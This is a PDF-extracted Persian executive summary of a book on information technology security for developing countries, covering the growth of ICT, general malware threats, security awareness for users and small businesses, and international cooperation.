‫ﻛﺘﺎﺏ ﺑﻬﺘـﺮﻳﻦ ﻭ ﻧـﻮﻳﻦﺗـﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﺭﺍ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫــﺪ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﺍﺻــﻞ ﺑــﺮﺍﻱ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﻋـﻼﻭﻩ‬
‫ﻲ ﻣﻮﺟـﻮﺩ‬
‫ﺑﺮ ﺍﺭﺍﺋﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺑـﻪ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ‪،‬‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﻣﺸﺎﺭﻛﺖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻫﻤﻜﺎﺭ‬
‫ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛـﻪ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‪ ،‬ﻣﺆﺳـﺴﺎﺕ‬
‫ﺣﺮﻓﻪﺍﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﭘﻨﺞ‬
‫ﺑﺨﺶ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﻛﻪ ﻫﺮﻳﻚ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻞ ﺍﺯ‬
‫ﺩﻳﮕﺮﻱ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩ‪.‬‬
‫ﺍﻳﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ﻣﻮﺿﻮﻋﺎﺕ ﺍﺻﻠﻲ ﻛﺘﺎﺏ ﺭﺍ ﭘﻮﺷـﺶ ﺩﺍﺩﻩ ﻭ‬
‫ﺩﺭ ﻗﺴﻤﺘﻲ ﺑﺎ ﻋﻨﻮﺍﻥ "ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﮐﺘﺎﺏ" ﺗﺼﻮﻳﺮﻱ ﻛﻠﻲ ﺍﺯ ﻫﺮ‬
‫ﺑﺨﺶ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﺩﺭ ﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺍﺑﺘﺪﺍ ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﺷﺪ ﺑﺨﺶ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ )‪ (ICT‬ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺭﺷﺪ ﻭ ﺍﺭﺗﻘﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ‪ ICT‬ﺭﺍ‬
‫ﺩﺭ ﺑﺮ ﻣﻲ ﮔﻴﺮﺩ ﻭ ﺍﺯ ﺍﻓﺰﺍﻳﺶ ﺗﻌﺪﺍﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺧـﺎﻧﮕﻲ ﻭ ﺭﺷـﺪ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )‪ - ١(SMEs‬ﻛﻪ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ ﻭ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻥ ﺩﺭ‬
‫ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻣﺘﻜﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ‪-‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻥ ﭘﻲ ﺑﺮﺩ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺍﺯ ﺳﻮﺍﺑﻖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ‬
‫ﺗﺄﻣﻴـﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺩﻭ‬
‫ﺳﻄﺢ ﻓﺮﺩﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻲ ﭼﺸﻤــﮕﻴﺮ ﺍﺳﺖ‪ ،‬ﺍﻃﻼﻉ ﺍﺯ ﻣﺒﺎﺣـــﺚ‬
‫‪Small and Medium Sized Enterprises‬‬
‫‪1‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻭ ﻣﻬﻢ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺗﻲ ﻛـﻪ ﻫﻨﮕـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻳﻨﺘـﺮﻧﺖ ﻣﺘﻮﺟﻪ ﺁﻧﻬﺎ ﺍﺳﺖ ﻣﻄﻠﻊ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻄـﺮﺍﺕ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨـﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺩﻳـﻮﺍﺭﻩ ﻫـﺎﻱ ﺁﺗـﺶ‪ ،٢‬ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ‪،٣‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٤‬ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﻗﺎﻋـﺪﻩﻣﻨـﺪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﻪ ﺩﻟﻴـﻞ‬
‫ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺘﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﮔﻴـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺩﺭ ﺭﻓﺘـﺎﺭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﺑﻪ ﺗﻌﻮﻳﻖ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﺭﺍﻩﺣﻞ ﻓﻨـﻲ‬
‫ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﻪ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺳﻄﻮﺡ ﺍﻣﻨﻴﺖ‬
‫ﺗﻮﺟﻬﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﻧﺪﺍﻧﻨﺪ ﻛﻪ ﺑﺪﻭﻥ ﺗﻮﺟـﻪ ﺑـﻪ ﺁﻥ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺪﺕ ﺩﭼﺎﺭ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻤﻦ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﺗـﺄﺧﻴﺮ‬
‫ﺑﻴﺎﻧﺪﺍﺯﻧﺪ ﻭ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭ‬
‫ﻣﺪﻳﺮﺍﻥ ﻧﻴﺰ ﻛﻮﺗﺎﻫﻲ ﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ‬
‫ﻣﻨﺎﺳﺐ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺗﺒﻬﻜﺎﺭﺍﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﻔﺎﻇﻬﺎﻱ ﻓﻨﻲ ﺭﺍ ﭘﺸﺖ ﺳﺮ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺘﻐﻴﺮ‪:‬‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴـﺎﺭ‪ ،‬ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻫﺎﻱ ﺭﺍﻳـﺞ ﻛﺎﺭﺑﺮﺩﻱ‪،‬‬
‫ﻭ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﻮﺟﺐ ﺍﻳﺠﺎﺩ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻲﺷﻮﻧﺪ‬
‫ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ﻭ ﻏﻴﺮﻣﺘﺨﺼﺺ ﺗﻨﻬﺎ ﻋﻠﺖ ﻧﻘـﺾ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻣﺤـﻴﻂ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺎ ﭘﻴﺪﺍﻳﺶ ﻣﺤﺼﻮﻻﺕ ﺟﺪﻳﺪ ﺧـﺼﻮﺻﹰﺎ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬
‫ﺳــﻴﺎﺭ )ﻣﺎﻧﻨــﺪ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻛﻴﻔــﻲ‪ ،‬ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﻭ ‪PDA‬ﻫــﺎ‪ (٥‬ﻛــﻪ‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﺯﻳﺮﺳـﺎﺧﺖ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺍﺩﻩﻫـﺎ ﺍﻳﺠـﺎﺩ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺗﻐﻴﻴﺮ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺗﺠـﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴــﻚ ﻧﻴــﺰ ﻣﻮﺟــﺐ ﺑــﺮﻭﺯ ﭘﻴﭽﻴــﺪﮔﻴﻬﺎﻳﻲ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ‬
‫ﺷﺒﻜﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﺯ ﻫﻨﮕﺎﻡ ﻇﻬﻮﺭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﮔﺮﻓﺘـﻪ ﺗـﺎ ﺯﻣـﺎﻥ ﺭﻭﺍﺝ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،٦‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣﻨﺎﺳـﺐ‬
‫ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴـﺰ ﺑـﻪ‬
‫ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ‪.‬‬
‫‪Firewall‬‬
‫‪Virus Scanner‬‬
‫‪Encryption‬‬
‫‪Personal Digital Assistants‬‬
‫‪Online Banking‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪٢٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﺍﻭﺿﺎﻉ ﺭﺍ ﺑﺪﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻛﻨﻮﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﻗﺎﺩﺭ ﺑﻪ ﺗﻮﺳﻌﻪ ﻭ ﮔـﺴﺘﺮﺵ ﺗﻬﺪﻳـﺪﺍﺕ ﺧـﻮﺩ ﻣـﻲﺑﺎﺷـﻨﺪ‪ :‬ﻣﺜـﻞ‬
‫ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎ‪ ،٧‬ﻛﺮﻣﻬــﺎ‪ ٨‬ﻭ ﺗﺮﺍﻭﺍﻫــﺎﻳﻲ‪ ٩‬ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﺷﺪﻳﺪﺗﺮﻱ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﻭﺍﺭﺩ ﻛﻨﺪ‪ .‬ﺍﻳﻦ‬
‫ﺻــﺪﻣﺎﺕ ﺣﺘــﻲ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺍﺯ ﺑﻌــﻀﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﻣﺨــﺮﺏ‬
‫)ﺑﺪﺍﻓﺰﺍﺭﻫﺎ(‪ ١٠‬ﻧﻴـﺰ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗـﺮﺍﺭ‬
‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺗﻨﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ‬
‫ﺍﻫﻤﻴﺖ ﺷـﺎﻳﺎﻧﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﻭﺍﺿـﺢ ﺍﺳـﺖ ﻛـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻓﺮﺻﺘﻬﺎﻳﻲ ﻃﻼﻳﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓـﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﻛـﻪ‬
‫ﺣﺪﻭﺩ ﺩﻩ ﺳﺎﻝ ﻗﺒﻞ ﺣﺘﻲ ﺗﺼﻮﺭ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺳﺘﺮﺳﻲ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻫﻤﻴﺸﻪ ﻫﻢ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻗـﺎﺩﺭ‬
‫ﻣﻲﺳﺎﺯﺩ ﺗﺎ ﻧﮕﺎﻫﻲ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷــﻨﺪ ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﺭﺗﺒــﺎﻁ ﻣــﺮﺩﻡ ﺍﺯ ﻃﺮﻳــﻖ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﺳﻨﺘﻲ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺻﻮﻝ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﺗـﺄﺛﻴﺮ ﮔﺬﺍﺷـﺘﻪ ﺍﺳـﺖ؛‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻛﻨﻮﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻛﺎﻻﻫـﺎﻱ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ‪ ١١‬ﺑﻔﺮﻭﺷﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻫﻨـﻮﺯ ﺗﻌـﺪﺍﺩ ﺭﻗﺒـﺎ ﺩﺭ‬
‫ﺑﺎﺯﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ‬
‫ﻭ ﻣﺤﺼﻮﻻﺕ ﺷﺮﻛﺘﻬﺎﻱ ﺭﻗﻴﺐ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻊ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺁﻧﺴﻮﻱ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ ﺑـﺮﺍﻱ ﻫـﺮ‬
‫ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﺍﺳـﺖ‪ ،‬ﻫﻤﻜـﺎﺭﻱ ﮔـﺴﺘﺮﺩﻩﺍﻱ‬
‫ﺑﺮﺍﻱ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﻣﺪﻝ ﻳﻚ ﻧﻈﺎﻡ ﺷﺒﻜﻪﺍﻱ ﻛﺎﺭﺁﻣﺪ ﻭ ﺟﻬﺎﻧﻲ ﻻﺯﻡ‬
‫ﺍﺳﺖ‪.‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﻛﺘﺎﺏ‪:‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫‪Viruses‬‬
‫‪Worms‬‬
‫‪Trojans‬‬
‫)‪Malware (Malicious Software‬‬
‫‪Online‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺑﺨﺶ ﺍﻭﻝ ﻛﺘﺎﺏ ﻣﻘﺪﻣﻪﺍﻱ ﺑﺮ ﻣﺒﺎﺣـﺚ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻋـﺼﺮ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﺮﺩﻡ ﺍﺯ ﮔﺬﺷﺘﻪ ﺗﺎ ﻛﻨﻮﻥ ﻫﻤﻴـﺸﻪ ﻧﮕـﺮﺍﻥ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﺑﺪﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﻭﻧﺪ ﻛﺎﺭ ﺭﺍ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﻣﺤﺪﻭﺩﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﺮﺳﻴﻢ ﻛﺮﺩﻩ ﻭ ﺍﻧﻮﺍﻉ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺍﻋﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ‬
‫ﺩﺭ ﻗﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻭ ﺧﻄﺮﺍﺕ ﻛﺎﺭ ﺑﺎ‬
‫ﺁﻧﻬﺎ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫• ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ‬
‫• ﺗﻌﺮﻳﻒ ﺍﻣﻨﻴﺖ‬
‫• ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ‬
‫• ﻛﻠﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ‬
‫• ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﮔﺎﻫﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻧﻨﺪ ﻭﺟﻮﺩ‬
‫ﻭ ﮔﺴﺘﺮﺵ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺧـﺎﺹ‪ ،‬ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ‬
